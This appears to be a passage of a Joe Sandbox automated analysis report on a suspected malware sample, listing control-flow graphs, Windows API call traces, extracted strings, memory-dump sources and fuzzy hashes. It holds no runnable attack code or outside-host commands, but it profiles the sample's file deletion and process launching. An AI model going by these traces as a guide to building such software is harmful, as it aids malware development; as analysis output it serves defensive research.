                                                                                    • Part of subcall function 0040D631: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0040D6DF
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,00000800,?,00000000,75C05540,?,0040F3EA,?,00000003), ref: 0040E850
                                                                                  • _wcslen.LIBCMT ref: 0040E88B
                                                                                  • _wcslen.LIBCMT ref: 0040E8A0
                                                                                  • _wcslen.LIBCMT ref: 0040E8C6
                                                                                  • _memset.LIBCMT ref: 0040E8DC
                                                                                  • SHFileOperationW.SHELL32 ref: 0040E8FF
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0040E90C
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040E91A
                                                                                  • _wcscat.LIBCMT ref: 0040E9D0
                                                                                  • _wcslen.LIBCMT ref: 0040EA08
                                                                                  • _realloc.LIBCMT ref: 0040EA1A
                                                                                  • _wcscat.LIBCMT ref: 0040EA34
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040EA65
                                                                                  • _wcslen.LIBCMT ref: 0040EAAE
                                                                                  • _wcscpy.LIBCMT ref: 0040EBCC
                                                                                  • _wcsrchr.LIBCMT ref: 0040EBDC
                                                                                  • _wcscpy.LIBCMT ref: 0040EBFB
                                                                                  • GetDlgItem.USER32(?,00000066), ref: 0040EC14
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040EC24
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040EC33
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0040EC5F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$File$AttributesMessageSendTextWindow_wcscat_wcscpy$DeleteEnvironmentExpandH_prologItemOperationStrings_memset_realloc_wcsrchr
                                                                                  • String ID: "$%s.%d.tmp$<br>$C:\Users\user\AppData\Local\Temp$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\
                                                                                  • API String ID: 3339014310-1943431393
                                                                                  • Opcode ID: a312bfa86ed5c22f0a26de5229e35c58a4d19bbac0fd92d548106ffd5423603c
                                                                                  • Instruction ID: e3878ae73ee75937aca8c0adb5b40f7b6819d108fae1ee0c947c7289b3b33f64
                                                                                  • Opcode Fuzzy Hash: a312bfa86ed5c22f0a26de5229e35c58a4d19bbac0fd92d548106ffd5423603c
                                                                                  • Instruction Fuzzy Hash: 62F15FB1904219ABDF20DBA1DC45FEE7378BF04314F4408BBF605B21D1EB789A998B59

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 453 41d67c-41d68b 454 41d6b4 453->454 455 41d68d-41d699 453->455 456 41d6b7-41d6c3 call 41eba7 454->456 455->454 457 41d69b-41d6a2 455->457 461 41d6c5-41d6cc call 41d624 456->461 462 41d6cd-41d6d4 call 41e8ad 456->462 457->454 458 41d6a4-41d6b2 457->458 458->456 461->462 467 41d6d6-41d6dd call 41d624 462->467 468 41d6de-41d6ed call 423b09 call 4238b5 462->468 467->468 475 41d6f7-41d713 GetCommandLineA call 42377e call 4236c3 468->475 476 41d6ef-41d6f6 call 421245 468->476 483 41d715-41d71c call 421245 475->483 484 41d71d-41d724 call 42344b 475->484 476->475 483->484 489 41d726-41d72d call 421245 484->489 490 41d72e-41d737 call 421304 484->490 489->490 495 41d740-41d748 call 4233ec 490->495 496 41d739-41d73f call 421245 490->496 501 41d750-41d752 495->501 502 41d74a-41d74e 495->502 496->495 503 41d753-41d766 call 40fcfb 501->503 502->503 506 41d768-41d769 call 4214b5 503->506 507 41d76e-41d7ca call 4214e1 call 41f891 503->507 506->507
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp__wincmdln
                                                                                  • String ID:
                                                                                  • API String ID: 3545360858-0
                                                                                  • Opcode ID: a55bb9f3dfa655b7c8a7d3ad90ba15450eb4b47b4cad154de41e312a3148be5c
                                                                                  • Instruction ID: 585dd34c56a54c5d764deeccdbd77e89776c7e0983f8679d63152811ed296333
                                                                                  • Opcode Fuzzy Hash: a55bb9f3dfa655b7c8a7d3ad90ba15450eb4b47b4cad154de41e312a3148be5c
                                                                                  • Instruction Fuzzy Hash: 9E21E7B0E0032499EB147F73B846BBD22B8AF1070CF50046FF459AA1D2EB7C99C0865D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 515 40bae4-40bb0f call 41a250 call 41a860 call 41c7d9 522 40bb11-40bb31 GetModuleFileNameW call 41c7ff 515->522 523 40bb3a-40bb6c call 41a56b call 4086a6 call 4086e3 515->523 528 40bdc0-40bdcc 522->528 529 40bb37 522->529 534 40bb82-40bb8c 523->534 535 40bb6e-40bb7d call 408b9d 523->535 529->523 536 40bb8d-40bb91 534->536 543 40bdbf 535->543 538 40bb97-40bbb7 call 408ace call 408d9b 536->538 539 40bcae-40bcd5 call 408f0d call 41ccee 536->539 549 40bbbc-40bbc6 538->549 550 40bdb5-40bdbe call 408b9d 539->550 551 40bcdb-40bce1 call 408d9b 539->551 543->528 552 40bc7a-40bc9e call 408f0d 549->552 553 40bbcc-40bbd6 549->553 550->543 559 40bce6-40bced 551->559 552->536 571 40bca4-40bca8 552->571 556 40bbd8-40bbe0 553->556 557 40bbfd-40bc01 553->557 556->557 561 40bbe2-40bbfb call 41cdb8 556->561 562 40bc03-40bc0f 557->562 563 40bc2f-40bc32 557->563 567 40bcf6-40bd05 call 41ccee 559->567 568 40bcef-40bcf4 559->568 561->557 583 40bc72-40bc77 561->583 562->563 570 40bc11-40bc19 562->570 565 40bc34-40bc3c 563->565 566 40bc5d-40bc66 563->566 565->566 572 40bc3e-40bc57 call 41cdb8 565->572 566->553 573 40bc6c 566->573 578 40bdaf 567->578 589 40bd0b-40bd29 call 4118ad call 41a27a 567->589 574 40bd2b-40bd35 568->574 570->563 577 40bc1b-40bc2d call 41c5cc 570->577 571->539 571->578 572->566 572->578 573->552 579 40bd37 574->579 580 40bd39-40bd46 574->580 577->563 590 40bc6e 577->590 578->550 579->580 586 40bda4-40bdac 580->586 587 40bd48-40bd52 580->587 583->552 586->578 587->586 591 40bd54-40bd58 587->591 589->574 590->583 593 40bd5a-40bd61 591->593 594 40bd8b-40bd8f 591->594 598 40bd63-40bd66 593->598 599 40bd86 593->599 596 40bd91-40bd95 594->596 597 40bd97 594->597 596->597 601 40bd9a-40bda2 596->601 602 40bd99 597->602 603 40bd82-40bd84 598->603 604 40bd68-40bd6b 598->604 605 40bd88-40bd89 599->605 601->586 601->587 602->601 603->605 607 40bd6d-40bd70 604->607 608 
40bd7e-40bd80 604->608 605->602 609 40bd72-40bd74 607->609 610 40bd7a-40bd7c 607->610 608->605 609->601 611 40bd76-40bd78 609->611 610->605 611->605
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040BAE9
                                                                                  • _wcschr.LIBCMT ref: 0040BB00
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,004325BC,0040C266,0040FE11,00438820,0040FE11,00438820), ref: 0040BB19
                                                                                  • _wcsrchr.LIBCMT ref: 0040BB28
                                                                                  • _wcscpy.LIBCMT ref: 0040BB3E
                                                                                  • _malloc.LIBCMT ref: 0040BCC5
                                                                                    • Part of subcall function 00408ACE: SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408B01
                                                                                    • Part of subcall function 00408ACE: GetLastError.KERNEL32(?,?), ref: 00408B0E
                                                                                  • _strncmp.LIBCMT ref: 0040BBF1
                                                                                  • _strncmp.LIBCMT ref: 0040BC4D
                                                                                  • _malloc.LIBCMT ref: 0040BCFB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: File_malloc_strncmp$ErrorH_prologLastModuleNamePointer_wcschr_wcscpy_wcsrchr
                                                                                  • String ID: *messages***$*messages***$a
                                                                                  • API String ID: 644328012-1639468518
                                                                                  • Opcode ID: 10317417a4586eca6946355d169243879a170e5a8fd4d52b0636de9141d84393
                                                                                  • Instruction ID: fae4271b5ca5faa12ece0e2ec7287f41438ce36a16ccd444264b88eb91a75a81
                                                                                  • Opcode Fuzzy Hash: 10317417a4586eca6946355d169243879a170e5a8fd4d52b0636de9141d84393
                                                                                  • Instruction Fuzzy Hash: BE81D171A002059BDB24AF64CC85BEAB7B4EF10354F10457FE695B72D1DB789A80CA8D

                                                                                  Control-flow Graph

                                                                                   • Graph image omitted (basic blocks 40c00e-40c257; executed/not-executed colouring not reproduced)
                                                                                  APIs
                                                                                    • Part of subcall function 0040BF27: _wcschr.LIBCMT ref: 0040BF57
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040C037
                                                                                  • GetClientRect.USER32(?,?), ref: 0040C044
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040C0D0
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040C0F4
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040C101
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0040C120
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040C146
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 0040C155
                                                                                  • GetWindow.USER32(?,00000005), ref: 0040C162
                                                                                  • GetWindowTextW.USER32(00000000,?,00000400), ref: 0040C18F
                                                                                  • SetWindowTextW.USER32(00000000,00000000), ref: 0040C1BF
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0040C1D2
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000110,00000000,00000110,00000204), ref: 0040C22F
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0040C23A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                  • String ID:
                                                                                  • API String ID: 4134264131-0
                                                                                  • Opcode ID: 08dc7c77311b924382860ca2428d645387aaf5d18714a7fe9270ec02dbb33203
                                                                                  • Instruction ID: 83760e71496a0374b0b2c3c7462e578a832f05ba5207c20b6528c65cc0e3b382
                                                                                  • Opcode Fuzzy Hash: 08dc7c77311b924382860ca2428d645387aaf5d18714a7fe9270ec02dbb33203
                                                                                  • Instruction Fuzzy Hash: 37712971A00219EFDF10DFE8DC89AEEBBB9FF08310F048129F915A61A0D7749A55CB94

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(00000068,00000000), ref: 0040D159
                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040D296,00000001,?,?,0040E176,0042A830,0044BF30,0044BF30,00001000), ref: 0040D186
                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0040D192
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,0042A724), ref: 0040D1A1
                                                                                  • SendMessageW.USER32(004012F5,000000B1,05F5E100,05F5E100), ref: 0040D1B5
                                                                                  • SendMessageW.USER32(004012F5,0000043A,00000000,?), ref: 0040D1CC
                                                                                  • SendMessageW.USER32(004012F5,00000444,00000001,0000005C), ref: 0040D207
                                                                                  • SendMessageW.USER32(004012F5,000000C2,00000000,00000456), ref: 0040D216
                                                                                  • SendMessageW.USER32(004012F5,000000B1,05F5E100,05F5E100), ref: 0040D21E
                                                                                  • SendMessageW.USER32(004012F5,00000444,00000001,0000005C), ref: 0040D242
                                                                                  • SendMessageW.USER32(004012F5,000000C2,00000000,0042A7F8), ref: 0040D253
                                                                                    • Part of subcall function 00418F00: DestroyWindow.USER32(?,75C05540,0040D183,?,?,?,?,?,0040D296,00000001,?,?,0040E176,0042A830,0044BF30,0044BF30), ref: 00418F0B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$DestroyItemShow
                                                                                  • String ID: \
                                                                                  • API String ID: 2996232536-2967466578
                                                                                  • Opcode ID: 1ad0790bab26b30c8b81776c8fd295548d614ad83e21288c0110c87a32675c13
                                                                                  • Instruction ID: b73a047212543c466c214dc37ee7a3e93f324aea90a0f7c159de315576d9ffd8
                                                                                  • Opcode Fuzzy Hash: 1ad0790bab26b30c8b81776c8fd295548d614ad83e21288c0110c87a32675c13
                                                                                  • Instruction Fuzzy Hash: C131D470E4025CBEEB219B90CC4AFAE7FB9EB81714F204129F604BA1D0C7B55D10DB59

                                                                                  Control-flow Graph

                                                                                   • Graph image omitted (basic blocks 40e315-40e533; executed/not-executed colouring not reproduced)
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0040E332
                                                                                  • _memset.LIBCMT ref: 0040E34D
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0040E443
                                                                                  • IsWindowVisible.USER32(?), ref: 0040E47C
                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040E48A
                                                                                  • WaitForInputIdle.USER32(?,000007D0), ref: 0040E498
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0040E4B5
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E4D4
                                                                                  • ShowWindow.USER32(?,00000001), ref: 0040E52D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_memset_wcslen
                                                                                  • String ID: .exe$.inf
                                                                                  • API String ID: 3215649069-3750412487
                                                                                  • Opcode ID: c43d5cea43acb8451b998e593abe7df8778e72f0008cb859fe992623c606565e
                                                                                  • Instruction ID: 3ccf00b328ba57d64acbb030228f5c5aef6956b37b3d39e4c31579fdc7cdee16
                                                                                  • Opcode Fuzzy Hash: c43d5cea43acb8451b998e593abe7df8778e72f0008cb859fe992623c606565e
                                                                                  • Instruction Fuzzy Hash: 59519371904358BADF21ABA2DC405AE7FB4AF00304F048C7BE941B72E1E77999A5CB49

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • LoadLibraryW.KERNELBASE(riched32.dll,00000000,00438820,?,?,?,0040FE06), ref: 00419DF0
                                                                                  • LoadLibraryW.KERNEL32(riched20.dll,?,0040FE06), ref: 00419DF9
                                                                                  • OleInitialize.OLE32(00000000), ref: 00419E00
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00419E18
                                                                                  • SHGetMalloc.SHELL32(0044E800), ref: 00419E23
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$CommonControlsInitInitializeMalloc
                                                                                  • String ID: riched20.dll$riched32.dll
                                                                                  • API String ID: 448729520-3294723617
                                                                                  • Opcode ID: 90f14c158bcb89b69ea4bae273e6414ebbc239f5036364857f5d8bbe2d5c0ea4
                                                                                  • Instruction ID: bec1f3dff02ca963225762dc8c306ba0fdf2f44245cb56c0a91269f9c2818cf8
                                                                                  • Opcode Fuzzy Hash: 90f14c158bcb89b69ea4bae273e6414ebbc239f5036364857f5d8bbe2d5c0ea4
                                                                                  • Instruction Fuzzy Hash: F7F0E271B00308AFD7209FA1DC0DB8ABBE8EF40726F50042DE54493140D7B8A4018BA9

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00409B26: GetVersionExW.KERNEL32(?), ref: 00409B4B
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 00411196
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 004111A6
                                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 004111B2
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 004111C0
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 004111CA
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,00000000,00000000,00000001), ref: 00411217
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00411294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  • Opcode ID: 1c7870660a01dd65847697781f7578502900650e516b8c8511763e6d701e722f
                                                                                  • Instruction ID: 6100f1ab939499973783bd8b64e41088d3a7059288243f2f455175224bc31f79
                                                                                  • Opcode Fuzzy Hash: 1c7870660a01dd65847697781f7578502900650e516b8c8511763e6d701e722f
                                                                                  • Instruction Fuzzy Hash: DF410C71E00218ABCF14DFA5C8849EEB7F9FF48310B14856FE946E7254D738A949CB64

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • SystemTimeToFileTime.KERNEL32(?,00411418,?,?), ref: 00411303
                                                                                  • LocalFileTimeToFileTime.KERNEL32(00411418,?), ref: 0041132F
                                                                                  • FileTimeToSystemTime.KERNEL32(00411418,?), ref: 00411345
                                                                                  • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00411355
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00411363
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041136D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$Specific
                                                                                  • String ID:
                                                                                  • API String ID: 3144155402-0
                                                                                  • Opcode ID: 16b3e87f3902756ff9327c032ae1a939148972bfe42c74fb0637f5a5c809bf78
                                                                                  • Instruction ID: f31d9a43c15d5ace768677a2ffe202ee34847638ee321b2b61110941f9993af9
                                                                                  • Opcode Fuzzy Hash: 16b3e87f3902756ff9327c032ae1a939148972bfe42c74fb0637f5a5c809bf78
                                                                                  • Instruction Fuzzy Hash: 16315E7AE0021D9BCB14DFE4C840AEFB7B8FF48710F04452AE955E3214E734A985CBA9

                                                                                  Control-flow Graph

                                                                                   • Graph image omitted (basic blocks 41a27a-41a307; executed/not-executed colouring not reproduced)
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 0041A298
                                                                                    • Part of subcall function 0041ED53: __mtinitlocknum.LIBCMT ref: 0041ED69
                                                                                    • Part of subcall function 0041ED53: __amsg_exit.LIBCMT ref: 0041ED75
                                                                                    • Part of subcall function 0041ED53: EnterCriticalSection.KERNEL32(0041A71B,0041A71B,?,004251F8,00000004,0042DAA0,0000000C,004210EE,00000000,0041A72A,00000000,00000000,00000000,?,0041E716,00000001), ref: 0041ED7D
                                                                                  • ___sbh_find_block.LIBCMT ref: 0041A2A3
                                                                                  • ___sbh_free_block.LIBCMT ref: 0041A2B2
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041ED34,00000000,0042D8B8,0000000C,0041ED6E,00000000,0041A71B,?,004251F8,00000004,0042DAA0,0000000C), ref: 0041A2E2
                                                                                  • GetLastError.KERNEL32(?,004251F8,00000004,0042DAA0,0000000C,004210EE,00000000,0041A72A,00000000,00000000,00000000,?,0041E716,00000001,00000214), ref: 0041A2F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2714421763-0
                                                                                  • Opcode ID: bcbe32db6af557ffe86c7d94739138752961402e38fc8840a2aae5f7b369d5ba
                                                                                  • Instruction ID: 381a15fe1de2b8d741a4582f625916aaa43432517cedc4ba20c03ca41f2b946c
                                                                                  • Opcode Fuzzy Hash: bcbe32db6af557ffe86c7d94739138752961402e38fc8840a2aae5f7b369d5ba
                                                                                  • Instruction Fuzzy Hash: 5401F735906205A6DB307BB2AC06BCE3664AF01728F10415FF911962D1DB3D88D18B5E

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00410DF7: ResetEvent.KERNEL32(?,00000200,?,?,0040500E), ref: 00410E1D
                                                                                    • Part of subcall function 00410DF7: ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00410E2D
                                                                                  • ReleaseSemaphore.KERNEL32(?,00000020,00000000,02271260,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410EBF
                                                                                  • CloseHandle.KERNEL32(02271264,02271264,0044E590,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410EE0
                                                                                  • DeleteCriticalSection.KERNEL32(02271400,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410EF6
                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410F02
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00410FB2,?,?,00401024,?,?,0040128E), ref: 00410F0A
                                                                                    • Part of subcall function 00410C6C: WaitForSingleObject.KERNEL32(?,000000FF,00410E3A,?), ref: 00410C72
